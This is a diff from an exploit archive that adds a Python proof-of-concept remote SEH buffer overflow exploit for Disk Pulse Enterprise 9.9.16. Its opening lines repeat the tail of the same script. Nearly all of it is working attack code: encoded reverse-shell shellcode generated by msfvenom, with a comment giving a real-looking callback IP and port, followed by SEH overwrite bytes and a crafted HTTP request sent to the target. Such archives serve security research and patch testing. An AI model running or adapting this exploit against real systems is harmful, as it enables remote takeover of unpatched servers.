+payload += 'D' * (5000-len(payload)) # Additional Padding
+
+s  = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+try:
+    s.connect((target,port))
+    print "[*] Connection Success."
+except:
+    print "Connction Refused %s:%s" %(target,port)
+    sys.exit(2)
+    
+packet =  "GET /../%s HTTP/1.1\r\n" %payload # Request & Headers
+packet += "Host: 4.2.2.2\r\n"
+packet += "Connection: keep-alive\r\n"
+packet += "Referer: http://pyramidcyber.com\r\n"
+packet += "\r\n"
+s.send(packet)
+s.close()

platforms/windows/remote/42560.py

@@ -0,0 +1,96 @@
+#!/usr/bin/env python
+# Exploit Title: Disk Pulse Enterprise 9.9.16 Remote SEH Buffer Overflow
+# Date: 2017-08-25
+# Exploit Author: Nipun Jaswal & Anurag Srivastava
+# Author Homepage: www.pyramidcyber.com
+# Vendor Homepage: http://www.diskpulse.com
+# Software Link: http://www.diskpulse.com/setups/diskpulseent_setup_v9.9.16.exe
+# Version: v9.9.16
+# Tested on: Windows 7 SP1 x64
+# Steps to Reproduce : Go to Options --> Server --> Check Enable Web Server on Port, Enter Any Port[8080] --> Save 
+import socket,sys
+target = "127.0.0.1"
+port = 8080
+
+#msfvenom -p windows/shell_reverse_tcp LHOST=185.92.223.120 LPORT=4443 EXITFUN=none -e x86/alpha_mixed -f python
+buf =  ""
+buf += "\x89\xe3\xda\xde\xd9\x73\xf4\x5b\x53\x59\x49\x49\x49"
+buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
+buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
+buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
+buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x4d\x38\x6d"
+buf += "\x52\x35\x50\x37\x70\x65\x50\x71\x70\x6b\x39\x4d\x35"
+buf += "\x70\x31\x4b\x70\x63\x54\x6c\x4b\x56\x30\x76\x50\x4c"
+buf += "\x4b\x63\x62\x76\x6c\x4c\x4b\x50\x52\x76\x74\x4c\x4b"
+buf += "\x42\x52\x36\x48\x34\x4f\x58\x37\x51\x5a\x37\x56\x46"
+buf += "\x51\x79\x6f\x6e\x4c\x55\x6c\x31\x71\x51\x6c\x67\x72"
+buf += "\x34\x6c\x51\x30\x59\x51\x48\x4f\x36\x6d\x65\x51\x79"
+buf += "\x57\x59\x72\x6b\x42\x72\x72\x72\x77\x4c\x4b\x52\x72"
+buf += "\x76\x70\x6c\x4b\x61\x5a\x77\x4c\x6e\x6b\x42\x6c\x66"
+buf += "\x71\x50\x78\x6a\x43\x32\x68\x75\x51\x6b\x61\x36\x31"
+buf += "\x4e\x6b\x70\x59\x47\x50\x75\x51\x7a\x73\x4c\x4b\x30"
+buf += "\x49\x66\x78\x79\x73\x64\x7a\x73\x79\x6c\x4b\x45\x64"
+buf += "\x4c\x4b\x36\x61\x7a\x76\x50\x31\x6b\x4f\x4e\x4c\x4f"
+buf += "\x31\x7a\x6f\x36\x6d\x43\x31\x39\x57\x74\x78\x6b\x50"
+buf += "\x31\x65\x6b\x46\x43\x33\x53\x4d\x68\x78\x77\x4b\x33"
+buf += "\x4d\x31\x34\x44\x35\x78\x64\x56\x38\x6e\x6b\x36\x38"
+buf += "\x75\x74\x56\x61\x78\x53\x65\x36\x4e\x6b\x66\x6c\x30"
+buf += "\x4b\x6e\x6b\x33\x68\x65\x4c\x63\x31\x68\x53\x6c\x4b"
+buf += "\x65\x54\x4e\x6b\x33\x31\x58\x50\x6e\x69\x43\x74\x31"
+buf += "\x34\x65\x74\x53\x6b\x71\x4b\x71\x71\x46\x39\x72\x7a"
+buf += "\x53\x61\x39\x6f\x49\x70\x43\x6f\x61\x4f\x61\x4a\x4e"
+buf += "\x6b\x44\x52\x78\x6b\x6e\x6d\x33\x6d\x33\x58\x75\x63"
+buf += "\x50\x32\x35\x50\x37\x70\x32\x48\x54\x37\x70\x73\x34"
+buf += "\x72\x63\x6f\x66\x34\x62\x48\x52\x6c\x52\x57\x44\x66"
+buf += "\x43\x37\x39\x6f\x79\x45\x4c\x78\x4e\x70\x43\x31\x45"
+buf += "\x50\x57\x70\x34\x69\x6f\x34\x51\x44\x70\x50\x53\x58"
+buf += "\x76\x49\x6f\x70\x50\x6b\x33\x30\x79\x6f\x5a\x75\x50"
+buf += "\x50\x46\x30\x42\x70\x46\x30\x51\x50\x62\x70\x67\x30"
+buf += "\x70\x50\x30\x68\x79\x7a\x56\x6f\x69\x4f\x49\x70\x69"
+buf += "\x6f\x48\x55\x6f\x67\x52\x4a\x36\x65\x75\x38\x68\x39"
+buf += "\x33\x6c\x6b\x6f\x74\x38\x52\x48\x43\x32\x57\x70\x44"
+buf += "\x51\x71\x4b\x4c\x49\x4b\x56\x31\x7a\x72\x30\x56\x36"
+buf += "\x50\x57\x63\x58\x6d\x49\x6d\x75\x34\x34\x63\x51\x79"
+buf += "\x6f\x4b\x65\x6c\x45\x6b\x70\x43\x44\x36\x6c\x69\x6f"
+buf += "\x72\x6e\x76\x68\x52\x55\x48\x6c\x52\x48\x78\x70\x6c"
+buf += "\x75\x6f\x52\x52\x76\x4b\x4f\x4e\x35\x42\x48\x43\x53"
+buf += "\x50\x6d\x35\x34\x63\x30\x6e\x69\x4d\x33\x62\x77\x43"
+buf += "\x67\x56\x37\x75\x61\x39\x66\x42\x4a\x62\x32\x31\x49"
+buf += "\x70\x56\x69\x72\x39\x6d\x72\x46\x59\x57\x51\x54\x45"
+buf += "\x74\x77\x4c\x33\x31\x46\x61\x4e\x6d\x37\x34\x57\x54"
+buf += "\x56\x70\x68\x46\x47\x70\x62\x64\x36\x34\x46\x30\x61"
+buf += "\x46\x36\x36\x62\x76\x70\x46\x72\x76\x32\x6e\x61\x46"
+buf += "\x30\x56\x56\x33\x70\x56\x73\x58\x53\x49\x48\x4c\x55"
+buf += "\x6f\x4f\x76\x49\x6f\x4a\x75\x4f\x79\x39\x70\x52\x6e"
+buf += "\x72\x76\x37\x36\x4b\x4f\x56\x50\x61\x78\x65\x58\x4e"
+buf += "\x67\x57\x6d\x75\x30\x39\x6f\x59\x45\x6f\x4b\x78\x70"
+buf += "\x4d\x65\x4e\x42\x71\x46\x71\x78\x6e\x46\x6c\x55\x4f"
+buf += "\x4d\x6f\x6d\x79\x6f\x59\x45\x35\x6c\x53\x36\x53\x4c"
+buf += "\x54\x4a\x4d\x50\x6b\x4b\x4b\x50\x54\x35\x65\x55\x6d"
+buf += "\x6b\x63\x77\x55\x43\x43\x42\x32\x4f\x63\x5a\x43\x30"
+buf += "\x72\x73\x4b\x4f\x48\x55\x41\x41"
+
+
+payload = buf # Shellcode begins from the start of the buffer
+payload += 'A' * (2492   - len(payload)) # Padding after shellcode till the offset value
+payload += '\xEB\x10\x90\x90' # NSEH, a short jump of 10 bytes
+payload += '\xDD\xAD\x13\x10' # SEH : POP EDI POP ESI RET 04  libpal.dll
+payload += '\x90' * 10 # NOPsled
+payload += '\xE9\x25\xBF\xFF\xFF' # Second JMP to ShellCode 
+payload += 'D' * (5000-len(payload)) # Additional Padding
+
+s  = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+try:
+    s.connect((target,port))
+    print "[*] Connection Success."
+except:
+    print "Connction Refused %s:%s" %(target,port)
+    sys.exit(2)
+    
+packet =  "GET /../%s HTTP/1.1\r\n" %payload # Request & Headers
+packet += "Host: 4.2.2.2\r\n"
+packet += "Connection: keep-alive\r\n"
+packet += "Referer: http://pyramidcyber.com\r\n"
+packet += "\r\n"
+s.send(packet)
+s.close()